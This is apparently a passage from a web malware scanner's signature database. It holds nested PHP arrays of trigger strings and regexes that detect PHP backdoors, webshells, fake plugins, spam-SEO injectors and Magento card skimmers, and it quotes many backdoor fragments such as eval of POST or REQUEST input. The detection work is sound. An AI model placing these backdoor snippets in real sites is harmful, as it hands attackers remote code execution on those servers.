		'|var|Wsites|if|ads_wins|window|so|facebook|search|360|sogou|' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.018', '<script>[\\s]*eval.function.p,a,c,k[^@]+sites.if.ads_wins.window.so.facebook.search[^>]+\\)\\)[\\s]*<.script>'),
		'C8N8HU|gd|is' => array(STR_CLEAR_LINEMATCH, 'js.malware.onclickads_net.001', 'eval.function.p,a,c,k,e,d.\{[^\|]+\|\|c[^\|]+\|[^\(\)]+C8N8HU\|gd\|is\|javascript.\.split\(.\|.\),0,\{\}\)\)'),
		'|viglink|js|com|script|insertBefore\'.split' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.048', 'eval\(function\(p,a,c,k[^>]+viglink.js.com.script.insertBefore[^}]+\{\}\)\)'),
	),

	'POST' => array(STR_TRIGGER,

		'eval\(base64_decode\(@?\$_POST\[' => array(REX_TRIGGER,

			'eval(base64_decode' => array(STR_TRIGGER,

				'@error_reporting(0);' => array(STR_TRIGGER,
					'@ini_set("log_errors",0);' => array(STR_TRIGGER,
						'exit;' => array(STR_TRIGGER,
							'@ini_set("memory_limit", "128M");' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.002.12', NULL),
						),
					),
				),

				'!== false) { print $_SERVER[' => array(STR_TRIGGER,
					'@flock($fp, LOCK_EX); @fputs($fp, $_SERVER[' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.002.14', NULL),
				),
				
				'exit;}' => array(STR_TRIGGER,
					'if ($_POST["php"])' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.002.15', 'if \(\$_POST\[.php.\]\)[\s]*\{[\s]*eval[^}]+\}'),
				),

				'@ini_get("safe_mode"),' => array(STR_TRIGGER,
					'pass"]==$_passssword)' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.002.13', NULL),
				),

				'$hash' => array(STR_TRIGGER,
					'=== $hash) @eval(base64' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.002.16', '\$hash[\s]*=[^;]+;[\s]*if[\s]*\([\s]*isset[^}]+\}[\s]*(if\(isset\(\$_GET\[[^\]]+\]\)+[\s]*\{[^\}]+\})?'),
				),

				'(md5(md5($_POST' => array(STR_TRIGGER,
					'die(eval(base64_decode($_POST[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.002.17', 'if[\s]*\(md5\(md5\(\$_POST[^\)]+\]\)\)[\s]*===[^\)]+\)[\s]*die\(eval\(base64_decode[^;]+\);'),
				),

				'if(md5($_GET[' => array(STR_TRIGGER,
					'==\'1\'){echo \'200\'; exit;}' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.002.18', NULL),
				),

				'error_reporting(0); set_time_limit(0); if ($_GET' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.002.09', 'error_reporting\(0[^\}]+\}[\s]*if\(\$_GET[^\)]+\)[\s]*eval\(base64_decode[^;]+\);'),
				'if[\s]*\([\s]*isset[\s]*\([\s]*\$_POST\[[^\]]+\][\s]*\)[\s]*\)[\s]*eval' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.002.10', 'if[\s]*\([\s]*isset[\s]*\([\s]*\$_POST\[[^\]]+\][\s]*\)[\s]*\)[\s]*eval[^;]+;'),
				'if[\s]*\([\s]*isset[\s]*\([\s]*\$_POST\[[^\]]+\][\s]*\)[\s]*\)[\s]*\{[\s]*eval' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.002.11', 'if[\s]*\([\s]*isset[\s]*\([\s]*\$_POST\[[^\]]+\][\s]*\)[\s]*\)[\s]*\{[\s]*eval[^\}]+\}'),
			),

			'eval\(base64_decode\(@?\$_POST\[' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.002.03', '[@]?eval.base64_decode.@?._POST..[a-zA-Z0-9]*[^; ]*;'),
		),

		'@eval($_POST[' => array(STR_TRIGGER,

			'copy(\'http' => array(STR_TRIGGER,
				'if(isset($_GET' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.140', 'if[\s]*\(isset\(\$_GET\[.[\w]+.\]\)\)[\s]*\{[\s]*echo[\s]*.{0,30};[\s]*\$[\w]+[\s]*=[\s]*copy\(.http.{0,70}\);[\s]*exit;[\s]*\}[\s]*@eval\(\$_POST\[.[\w]+.\]\);[\s]*\?>[\s]*File[\s]*Not[\s]*Found[\s]*404'),
			),

			'<\?php[\s]{20,}@eval\(\$_POST\[[^\]]+\]\);' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.124', '[\s]{20,}@eval\(\$_POST\[[^\]]+\]\);'),
			'extends Mage_Core_Controller_Front_Action' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.059', '@eval.\$_POST\[[^;]+][\s]*\)[\s]*;'),
			'@pack\("H\*",[\s]*\$[\w]+\);[\s]*\$_POST\[\$[\w]+\]=@pack\("H\*",[\s]*\$[\w]+\);' => array(REX_CLEARFILE, 'php.backdoor.eval_POST.142', NULL),
		),

		'echo \'' => array(STR_TRIGGER,

			'@eval($_POST[' => array(STR_TRIGGER,
		
				'if($_GET[\'' => array(STR_TRIGGER,
					'] == \'c\'){' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.058', 'if\(isset\(\$_GET\[.[\w]+.\]\)\){[\s]*if\(\$_GET\[.[\w]+.\][\s]*==[\s]*.[\w]+.\)\{[\s]*@eval\(\$_POST\[[^}]+}[\s]*if.._GET[^{]+c.\){[\s]*echo[^;]+;[\s]*}[\s]*exit;[\s]*}[\s]*(\/\/[\w]+)?'),
				),
		
				'!empty($_GET[$' => array(STR_TRIGGER,
					')==\'c\')' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.058.02', 'function [_\w]+\(\$str\)[\s]*\{[\s]*\$val[\s]*=[\s]*!empty.\$_GET[^;]+null;[\s]*return \$val;[^@]+@eval\(\$_POST\[[^}]+}[\s]*if\([^{]+==.c.\)[\s]*\{[\s]*echo[^;]+;[\s]*exit;[\s]*}[\s]*(\/\/[\w]+)?'),
				),
			),

			'echo \'<star>\';eval(base64_decode(str_replace(" ", "+", join(array_slice($a,count($a)-3)))));echo \'</star>\'' => array(STR_CLEARFILE, 'php.hacktool.litespeed_bypass.001', NULL),
		),

		'/(.*)/epreg_replac' => array(STR_TRIGGER,
			'$ua=strtolower($_SERVER[' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.fake_plugin.009', 'if\(!isset\(\$GLOBALS\[[^\{]+\{[\s]*\$ua=strtolower\(\$_SERVER\[[^;]+\]\);[\s]*if[\s]*\([\s]*\([\s]*![\s]*strstr\(\$ua,[^;]+\]=1;[\s]*\}[^\$]+\$[\w]+[\s]*=[\s]*\'[^\']+\';[\s]*\$[\w]+[\s]*=[\s]*explode\(chr\(\([^;]+[\d]+\'\);[\s]*\$[\w]+=substr[^>]+\$[\w]+=\$[\w]+-[\d]+;'),
			'= explode(chr((' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.fake_plugin.009.02', '\$[\w]+[\s]*=[\s]*\'[^\']+\';[\s]*\$[\w]+[\s]*=[\s]*explode\(chr\(\([^;]+[\d]+\'\);[\s]*\$[\w]+=substr[^>]+\$[\w]+=\$[\w]+-[\d]+;'),
		),

		'<title>404 Not Found</title>' => array(STR_TRIGGER,
			'.""."6"."".""."4".' => array(STR_CLEARFILE, 'php.backdoor.base64.006', NULL),
		),

		'=fopen($_SERVER[\'DOCUMENT_ROOT\']."' => array(STR_TRIGGER,
			'echo $a.$b.$c' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.076', NULL),
		),

		'preg_' => array(STR_TRIGGER,
			'* DM-5HELL 2014 *' => array(STR_CLEARFILE, 'php.hacktool.shell-uploader.007', NULL),
		),

		'if(md5($_POST' => array(STR_TRIGGER,
			'eval(base64_decode($_POST[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.002.008', 'if\(md5\(\$_POST\[.\w+.\]\)\s*=+\s*.\w+.\)\s*{\s*[@]?eval.base64_decode.@?._POST..[a-zA-Z0-9]*[^; ]*;(?:\s*})?'),
		),

		'/post",{"version":' => array(STR_TRIGGER,
			'function ajax(a,b,c){var d=null;try{d=new XMLHttpRequest}catch(e){try{' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.051', ';\(function\(.,.,.,.\)\{function .\(\)\{function ajax[^_]+loader:.\}[^:]+:.\.addEventListener[^\}]+\}\)\(window,document[^\}]+\}\);'),
		),

		'= shell_exec2("pwd", $_POST[\'verify\']);' => array(STR_CLEARFILE, 'php.backdoor.shell-exec.005', NULL),
		'echo "hashdeb :' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.hashdeb.001', '<.php if .._POST\["\w+"\]\)\{eval.base64_decode.\$_POST[^\{>]+?\{echo "hashdeb[^\}>]+?\}\s*\?>'),
		'$_POST["pass"]==$_passssword' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.026', '\$_passssword[\s]*=[\s]*[^;]+;[\s]*if[\s]*\(!@\$_POST[^}]+}[\s]*elseif\(!empty\(\$_POST[^}]+}[\s]*elseif[^}]+}[\s]*unset\(\$_passssword\);'),
		'));exit;}if(isset($_GET[sesion])){phpinfo()' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.035', '(\\$[\\w]+[\\s]*=[\\s]*[\'"][\\w]+[\'"];[\\s]*)?if.isset.._POST.[\\w]+\\]\\)\\)\\{[^@]*@eval.base64_decode.\\$_POST.[\\w]*\\]\\)\\);[^{]+\\)\\{phpinfo\\(\\);}'), //m by PG
		'eval($_POST[\'wp-load\']);' => array(STR_CLEARLINE,'php.backdoor.eval_POST.002.005', 'eval($_POST[\'wp-load\']);'),
		'eval(stripslashes(@$_POST' => array(STR_CLEAR_LINEMATCH,'php.backdoor.eval_POST.002.006', 'eval.stripslashes.@._POST[^;]*;'),
		'<?php @eval($_POST[http]);?>' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.022', '<\?php\s*\@eval.._POST.http..;\?>'),
		'$code=hexToStr($_POST[\'' =>array(STR_CLEAR_LINEMATCH, 'php.backdoor.hexToStr.001', '\@error_reporting.0.;\@set_time_limit.0.;function hexToStr\([^>]+?\{\$code=hexToStr.._POST\[[^>\}]+?\}\@eval..code.;'),
		'$auss = "' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.026.001', NULL),
		'<?php @eval($_POST[' => array(STR_CLEAR_LINEMATCH,'php.backdoor.eval_POST.039', '<\?php\s*@eval\(\$_POST\[[^\)]+\)(;)?\s*(die\(\);[\s]*|exit[^;]*;[\s]*)?\?>'),
		'X0MB13' => array(STR_CLEARFILE, 'php.backdoor.X0MB13shell.001', NULL),
		'eval(stripslashes(array_' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.052', 'eval.stripslashes.array[^$]+\$_POST\)\)\)[\s]*;?'),
		'@eval("\$getnum = $host;");' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.053', NULL),
		');}echo2($_POST[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.065', 'function\s*echo[^\(]+\(\$\w+\)\s*{\s*\@eval\(\$\w+\)\;}echo[^\$]+\$_POST[^\)]+\)\;'),
		'\]\(\$_COOKIE, \$_POST\) as \$\w+ => \$\w+\){function' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.093', '\$[\w]+[\s]*=[\s]*\'[^;]+\';[\s]*\$[\w]+[\s]*=[\s]*Array\(\);[\s]*\$[\w]+\[\][\s]*=[\s]*\$[\w]+\[[\d]+\][\s]*\.[^}]+\}[\s]*(function [\w]+[^\}]+\}[\s]*)+\}[\s]*\$[\w]+[\s]*=[\s]*[\w]+[^\}]+\);\}'),
		';if(get_magic_quotes_gpc()){function WSOstripslashes($array){${"\x' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.filesman.100', '\$\{.[^\}]+\\\\x[^\}]+\}\[.[^>]+WSOstripslashes\(\$_COOKIE[^\n]+exit;'),
		'= \'_POST\';$' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.109', '(\$\w+)\s*=\s*[\'"]_POST[\'"]\s*;\s*(\$\w+)\s*=\s*[\'"]\1[\'"]\s*;\s*eval\([\'"].\2\s*=[^;]+;.\)\s*;\s*\2\s*=\s*\$?\2\s*;\s*eval\(\@?\2\[\w+\]\)\s*;'),
		'@eval($_POST[admins]' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.113', '@eval\(\$_POST\[admins[^;]+\);'),
		'evals(@$_POST[' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.126', NULL),
		'<input type=hidden name=a value="FilesMAn">' => array(STR_CLEARFILE, 'php.backdoor.c99-shell.009', NULL),
	),

	'REQUEST' => array(STR_TRIGGER,

		'isset(' => array(STR_TRIGGER,

			'exit;' => array(STR_TRIGGER,
				'\'])/*' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_REQUEST.036', '(if\(isset\(\$_REQUEST\[.|\/\*\w+\*\/if|if\/\*\w+\*\/)[^\)]+\)\)[^\$]+\$_REQUEST\[.\w+.\]\)\/\*\w+\*\/;[^;]+[^\}]+\}'),
				'\'])){/*' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_REQUEST.033', '(if|\/\*\w+\*\/)[^\(]*\(isset\(\$_REQUEST\[[^\]]+\]\)\)\{[^\)]+\$_REQUEST\[[^\]]+\][^;]+[^\}]+\}'),
				'substr(strrev(md5(strrev(sha1($_REQUEST[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_REQUEST.053', 'if[\s]*\(isset\(\$_GET\[.[\w]*.\]\)[\s]*&&[\s]*substr\(strrev\(md5\(strrev\(sha1\(\$_REQUEST\[.[\w]*.\]\)\)\)\).[\s]*[\d]+\)[\s]*==[\s]*.[\w]+.\)[\s]*\{\(@copy\(\$_FILES\[[^\}]+&&!empty\(\$[\w]+\)\)[\s]*\{eval\(urldecode\(\$[\w]+\)\);exit;\}\}'),
			),

			'](__FILE__)){die($GLOBALS[' => array(STR_TRIGGER,
				'["SERVER_PORT"]){return true;}if($GLOBALS[' => array(STR_TRIGGER,
					'(){@eval($' => array(STR_CLEARFILE, 'php.backdoor.uploader.341', NULL),
				),
			),

			'if (!class_exists(\'ecode_slicer_du' => array(STR_CLEARFILE, 'php.backdoor.eval_REQUEST.051', NULL),
			'$_REQUEST[\'coco\'];' => array(STR_CLEARFILE, 'php.backdoor.eval_REQUEST.032', NULL),
			'])){die(pi()*' => array(STR_CLEARFILE, 'php.backdoor.eval_REQUEST.039', NULL),
		),


		'eval(stripslashes($_REQUEST[' => array(STR_TRIGGER,
	
			'<\?[^\n]+eval' => array(REX_TRIGGER,
				'<\?[^>]+?@?eval.stripslashes.\$_REQUEST[^;]+;[^\n]*?\?>' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.001.05', '<\?[^>]+?@?eval.stripslashes.\$_REQUEST[^;]+;[^\n]*(\?>)?'),
			),

			'if(isset($_REQUEST["' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.001.07', 'if\s*\(\s*isset\s*\(\s*\$_(REQUEST|POST|GET)\[.(\w+).\]\s*\)\s*\)\s*\{\s*eval\s*\(\s*stripslashes\(\$_\1\[.\2.\]\s*\)\s*\);\s*(die|exit)\(\);\s*\};?'),
			'(isset($_REQUEST[\'asc\']))' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.001.08', 'if[\s]*\([\s]*isset[\s]*\([\s]*\$_REQUEST\[.asc.\][\s\)]+[\s]*eval\(stripslashes\(\$_REQUEST\[.asc.\][\s\)]+;'),
		),

		'error_reporting(0)' => array(STR_TRIGGER,
			'($_REQUEST[\'xo\'])' => array(STR_CLEARFILE, 'php.backdoor.shell_dropper.002', NULL),
			'eval\(\$_REQUEST\[\w\]' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.eval_REQUEST.036', 'error_reporting\(0\);\s*eval\(\$_REQUEST\[\w+\]\);'),
		),

		'@ini_set(\'display_errors\', NULL);' => array(STR_TRIGGER,
			'unlink(__FILE__);' => array(STR_TRIGGER,
				'@ini_set(\'log_errors\',NULL);' => array(STR_TRIGGER,
					'html_entity_decode' => array(STR_TRIGGER,
						'array_map' => array(STR_TRIGGER,
							'if(empty($_REQUEST[' => array(STR_CLEARFILE, 'php.backdoor.eval_REQUEST.017', NULL),
						),
					),
				),
			),
		),

		'set_time_limit(0);error_reporting(NULL);' => array(STR_TRIGGER,
			'else{echo \'<!DOCTYPE' => array(STR_TRIGGER,
					'])!=NULL){eval(base64_decode($_REQUEST[' => array(STR_CLEARFILE, 'php.backdoor.eval_REQUEST.035', NULL),
			),
		),

		'eval($options[\'base\']);' => array(STR_TRIGGER,
			'$options[\'base\'] = wp_base($_REQUEST[' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.003', NULL),
		),

		']); echo \'OK\';' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.037', 'if\s*\(\$_REQUEST\[.(\w+).\]\)\s*\{eval\(\$_GET\[\1\]\);\s*echo\s*.OK.;[^;]+;\};'),
		'function bns_add_ajax(){eval($_REQUEST["data"]);}' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.002', NULL),
		'eval($a($_REQUEST[sam]));' => array(STR_CLEARFILE, 'php.backdoor.eval_REQUEST.010', NULL),
		'eval(stripslashes(\$_REQUEST[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.001', 'eval.stripslashes..\$_REQUEST..[a-zA-Z0-9_-]*....;'),
		'; exit(); } if(isset($_REQUEST' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.001.02', '\$[a-z0-9A-Z]{3,}\s+=\s+\"[a-z0-9A-Z]{30,}\";[^>]+eval\([^>]+exit\([^>]+exit\(\);\s+}'),
		'$post_var = "req";' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_REQUEST.011', '\$post_var[\s]*=[\s]*.req.;[\s]*if[\s]*\([\s]*isset[\s]*\([\s]*\$_REQUEST\[\$post_var\]\)\)[\s]*\{[^\}]+exit[^;]*;[\s]*\}[\s]*;?[\s]*'),
		'/*versio:' => array(STR_CLEAR_LINEMATCH,'php.backdoor.determinator.002','\/\*versio:\w{1,2}(\.\d{1,2})+\*.\s*[^}]+\$GLOBALS[^>]+?GLOBALS\[[^>]+pack..H[^>]+;'),
		'$document->addCustomTag(eval($myvar));' => array(STR_CLEARFILE, 'php.backdoor.eval_REQUEST.014', NULL),
		'eval(stripslashes(@$_REQUEST' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.016', 'eval.stripslashes.@\$_REQUEST\[[^\]]+\]\)\)[\s]*;?'),
		'KTtAc2V0X3RpbWVfbGltaXQoMTUwKTtAaWdub3JlX3VzZXJfYWJvcnQodHJ1ZSk7QGluaV9zZXQoJ21heF9leGVjdXRpb25fdGltZScsMTUwKTtpZigkX1NFUlZFUlsnUkVRVUVTVF9NRVRIT0QnXT09' => array(STR_CLEAR_MULTIMATCH, 'php.malware.dropper.004', 'if[\s]*\([\s]*isset[\s]*[\s]*\([\s]*\$_REQUEST\[.[\w]+.\][\s]*\)[\s]*\)[\s]*\{[\s]*echo[^;]+;[\s]*\}[\s]*\$[\w]+[\s]*=[^@]+@eval\(\$[\w]+\([^;]+\)\);'), //fixed by PG
		'<\?php[\s]*\$[\w]+[\s]*=[\s]*\$_REQUEST\[[^;]+\];[\s]*eval\(base64_decode\(\$[\w]+\)\);[\s]*\?>' => array(REX_CLEAR_LINEMATCH, 'rex.backdoor.eval_REQUEST.029', '<\?php[\s]*\$[\w]+[\s]*=[\s]*\$_REQUEST\[[^;]+\];[\s]*eval\(base64_decode\(\$[\w]+\)\);[\s]*\?>'),
		'eval\(base64_decode\(\$_REQUEST\[\'(comment|c_id)\'\]\)\)' => array(REX_CLEAR_LINEMATCH, 'rex.backdoor.eval_REQUEST.034', '@?eval\(base64_decode\(\$_REQUEST\[.(comment|c_id).]\)\);?'),
		'call_user_func(function($' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_REQUEST.054', '\$[\w]*[\s]*=[\s]*call_user_func\(function\(\$[\w]*\)[\s]*\{[\s]*return[\s]*@\$_REQUEST\[\$[\w]*\];\},.[\d]*.\);[\s]*eval\(.\*\*.\(\$[\w]*\)\);'),
		'error_reporting(0); eval($_REQUEST[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.061', 'error_reporting\(0\); eval\(\$_REQUEST\[[\w]+\]\);'),
		'error_reporting(0); foreach($_REQUEST' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.063', '(error_reporting\([\w]+\);)[\s]*foreach\(\$_REQUEST[\s]*as[\s]*\$[\w]+\)[\s]*eval\(\$[\w]+\);[\s]*(error_reporting\([\w]+\);)'),
	),

	'fromCharCode' => array(STR_TRIGGER,

		'String.fromCharCode(eval(' => array(STR_TRIGGER,
			';try{}catch(' => array(STR_TRIGGER,

				'[\"body\"])}catch(' => array(STR_TRIGGER,
					');try{--(' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.hidden-iframe.012.02', 'if[\s]*\([\s]*empty[\s]*\([\s]*\$[\w]+[\s]*\)[\s]*\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*"[\s]*<script[^<]+<.script>[\s]*";[\s]*echo \$[\w]+;[\s]*\}'),
				),

				';try{--(' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.hidden-iframe.012', '([\w]+[\s]*=[\s]*[^;>]+;[\s]*)+[\w]+[\s]*=[\s]*window;[^\{]+try\{--\([\w]+..body.\]\)\}[\s]*catch[^;]+;[\s]*try\{\}[^"]+"[^\}]+;[\s]*\}[^\n]+\)\}'),
			),
		),

		'100, 111, 99, 117, 109, 101, 110, 116, 91' => array(STR_CHAIN_TRIGGER,
			'100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.041.05', 'eval\(String\.fromCharCode\(118, 97, 114[^\)]+\)+;?'),
			'var _0x[\w]+ = 1;' => array(REX_CLEAR_LINEMATCH, 'js.spam-seo.redirect.041.07', 'var _0x[\w]+ = 1;'),
		),

		'eval((function(){var' => array(STR_TRIGGER,
			'].concat(o);var' => array(STR_TRIGGER,
				'nepage|checkou' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.017', 'eval\\(\\(function\\(\\)\\{var[\\s]*[\\w]=\\[([\\d]+,){10}[^?]+\\}\\)\\(\'var[^^]+nepage\\|checkou[^^]+\'\\)\\);'),
			),
		),

		'<a href' => array(STR_TRIGGER,
			'<div id' => array(STR_TRIGGER,
				'|x74|getElementById|style|display|var|window\'.split(\'|\'),0,{}))' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.073', '<div id[\s]*=[^>]+>[\s]*(<a href[\s]*=[\s]*.http[^>]+title[\s]*=[^>]+>[^<]+<.a>[\s]*){3}[^\{]+<script[^>]*>[\s]*eval\(function\(p.a.c.k.e.d[^\$]+\$[\s]*=[^}]+\{\}\)\)[\s]*<.script>[\s]*<.div>'),
			),
		),

		'var str2 = String.fromCharCode(40,102,117,110,99,116,105,111,110,40,97,114,103,' => array(STR_TRIGGER,
			'110,101,114,72,84,77,76,34,93,32,61,32,34,60,105,102,114,97,109,101,32,119,105,' => array(STR_CLEARFILE, 'html.spam-seo.iframe-doorway.001', NULL),
		),

		'118, 97, 114, 32, 122, 32, 61\') !== false) {' => array(STR_TRIGGER,
			'str_replace("<head>", "<head>"' => array(STR_CLEARFILE, 'js.malware.createElement.002.02', NULL),
		),

		'";asd=function(){d.body++};a=("' => array(STR_TRIGGER,
			')eval(ss.fromCharCode.apply(ss,a));' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.071', 'ps="split";asd=function\(\)\{d\.body\+\+\};a=\(.[\d]+[\s]*,[^}]+\}[\s]*try[\s]*\{[\s]*asd\(\)[\s]*\}[^<]+eval\(ss\.fromCharCode\.apply\(ss,a\)\);'),
		),

		'+window.location.search.replace(\'?\', \'&\')+"&"+' => array(STR_TRIGGER,
			';}else if(_gl!=="!1"&&_gl!=="!2"&&_gl!==null){window[' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.077', 'var [\w]+[\s]*=[\s]*"[^"]+";[\s]*window\[[^\]]+\][\s]*=[\s]*window\[[^;]+\];[\s]*window\[[^\]]+\][\s]*=[^;]+;[\s]*var [\w]+[\s]*=[\s]*localStorage\.getItem[^}]+\}[\s]*else if\(_gl!=="!1"&&[^\}]+\}[\s]*if\([^\}]+\}[\s]*else[\s]*\{[\s]*[\w]\.getElementsByTagName\(.head.\)\[[^\}]+appendChild\(.\);[\s\}]+'),
		),

		'loadPNGData(strFile,' => array(STR_TRIGGER, 
			'data.png' => array(STR_CLEAR_MULTIMATCH, 'js.malware.loadPNGData.001', 'function loadPNGData.strFilename,\s*fncCallback[^>]+oData.i.\s*>[^>]+function loadFile[^;]+data.png.;[^;]+eval.strData.;[^;]+;[^;]+loadFile..;'),
		),

		'ebe7e10fc04a7d26ab181b0ebf675d26' => array(STR_CLEARFILE, 'js.malware.magento-cc-stealer.041', NULL),
		'=sTKpUGchN2cl9FKlBXYjNXZuVHKlRXaydnL05WZtV3YvR2O' => array(STR_CLEAR_LINEMATCH, 'js.malware.iframe_injector.008', ';\s*var\s*\w+\s*=\s*[\'"]\s*=sTKpUGchN2cl9FKlBXYjNXZuVHKlRXaydnL05WZtV3YvR2O[^;]+;\s*var\s*_\w+\s*=\s*\["[^,]+,"","charAt","indexOf","fromCharCode","length"\]\s*;\s*function\s*_\w+\(data\)\s*{\s*var\s*\w+\s*=\s*_\w+\[0\]\s*;[^;]+;\s*do{[^}]+}\s*else\s*{if\(\w+==\d+\)\s*{enc\+=String\[[^{]+{enc\+=String\[[^{]+{\s*var\s*\w+\s*=_\w+\[\d+\]\s*,\s*i=\d+\s*;\s*for\(i=string\[[^}]+}\s*;\s*return\s*\w+\s*;}\s*;\s*eval\([^;]+;'),
		'\'\x64\x61\x74\x61\':{\'\x66\x72\x6f\x6e\x74\x65\x6e\x64\':encData},\'\x73\x75\x63\x63\x65\x73\x73' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.040', '(?:\/\/)?(\w+)\.\w+\s*=\s*function\s*\(\)\s*{\s*return\s*typeof\s*\1\.(\w+)[^=]+=*.\s*function.\?\1\.[^\(]+\(\1\.\2,\s*arguments\s*\)\s*:\s*\1\.\2[^}]+}\s*;\1\.\w+=\s*function[^\{]+{\s*return\s*\w+\s*;\s*}\s*;\s*\1\.\w+\s*=\s*function[^}]+}\s*;\s*\1\.\w+\s*=[^\0]+decodeURI\("[^"]+"\s*\)\s*;\s*for\s*\(\s*var[^}]+}\s*\w+\+\s*=\s*String\.fromCharCode\([^\0]+;\(typeof\s*window=*.object.\?window:global\)\.\1\s*=\s*\1\s*;\s*var\s*[Bb]ase64\s*;\s*if\s*\(new\s*RegExp\(\1[^\0]+x66.x72.x6f.x6e.x74.x65.x6e.x64.:enc[Dd]ata\s*},[^\0]+,\1\.\w+\(\d+\)\)\s*;\s*return\s*\w+\s*;\s*}\s*}\s*;'),
		'100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59' => array(STR_CLEAR_LINEMATCH, 'js.malware.createElement.002', '<scrip[^>]+>\s*eval\s*\(\s*String\.fromCharCode\s*\(\s*(\d\d\d?, )+100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, (\d\d\d?, )+100, 111, 99, 117, 109, 101, 110, 116, 46, 104, 101, 97, 100, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40[^\)]+\)\s*\)\s*;?<.script>'),
		'|onTimeout|hostssl|iTimeout|POST|php|' => array(STR_CLEAR_LINEMATCH, 'js.malware.redirect.023', 'eval\(function\(p.a.c.k[^\n]+hostssl\|iTimeout[^\}]+\{\}\)\);?'),
	),

	'\x' => array(STR_TRIGGER,

		'JGF1dGhfcGFzcyA9ICR' => array(STR_TRIGGER,
			'\x36\x34' => array(STR_TRIGGER,
				'\x6F\x64\x65' => array(STR_CLEARFILE, 'php.backdoor.webshell.087', NULL),
			),
		),

		'"[\s]*Ly9' => array(REX_TRIGGER,
			'";@eval($' => array(STR_CLEARFILE, 'php.malware.fopo_obfuscator.001', NULL),
		),

		'($qo8(' => array(STR_TRIGGER,
			'Q2k4cUNpQXFJRkpGVmtsVFNVOU9Pa' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.018', NULL),
		),

		'\'X-Mailer: PHP/\' . \x70\x68\x70\x76\x65\x72\x73\x69\x6F\x6E(); \$' => array(STR_CLEARFILE, 'php.hacktool.mailer.085', NULL),
